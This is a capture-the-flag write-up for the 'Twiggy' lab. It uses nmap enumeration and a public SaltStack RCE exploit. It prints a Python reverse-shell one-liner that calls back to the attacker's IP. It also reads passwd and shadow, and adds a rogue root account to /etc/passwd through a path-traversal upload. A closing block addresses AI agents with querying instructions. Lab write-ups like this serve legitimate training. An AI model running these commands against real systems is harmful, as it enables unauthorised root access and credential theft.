# Twiggy

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.134.62 -t full`

`nmapAutomator.sh -H 192.168.134.62 -t vulns`

![](/files/-Mad29lXd5pEjyZzBSRG)

### Port 80

Mezzanine is running.

![](/files/-Mad2Tweau1WS75GEsZr)

### Port 8000

The SaltStack Salt REST API is running.

![](/files/-Mad2ljp5q3UDoM9Oqrp)

## Exploitation

SaltStack < 3000.2, < 2019.2.4, 2017.\*, 2018.\* is vulnerable to an RCE vulnerability.

Exploit from: <https://www.exploit-db.com/exploits/48421>

![](/files/-Mad2tnSmxlRKTFvcf50)

We can try to execute a reverse shell.

`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'`

However, this does not work (presumably because of the firewall).

We can, however, read arbitrary files, including `passwd` and `shadow`.

![](/files/-Mad85ptIjSfNXEjwejA)

![](/files/-Mad88nR4C4u9d_RFyEu)

We can also write arbitrary files. To add our own root user to `/etc/passwd`:

```bash
echo "root2:bWBoOyE1sFaiQ:0:0:root:/root:/bin/bash" >> passwd
```

Note that this hash corresponds to our custom password, `mypass`.

```bash
$ openssl passwd mypass                                                    
bWBoOyE1sFaiQ
```

Upload the modified file: `python3 48421.py --master 192.168.134.62 --upload-src passwd --upload-dest ../../../../../etc/passwd`

![](/files/-Mad8cMelAI3wA42-y2U)

Check that our user was correctly added:

![](/files/-Mad8iVgxoZ63q1UfCmZ)

Now, using the `root:mypass` credentials, we can SSH into the server as root. This works because password authentication is enabled.

![](/files/-Mad8tuakeUdisiGsaU-)

![](/files/-Mad9-YQJUQSbWzp9B2C)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pentesting.zeyu2001.com/proving-grounds/warm-up/twiggy.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.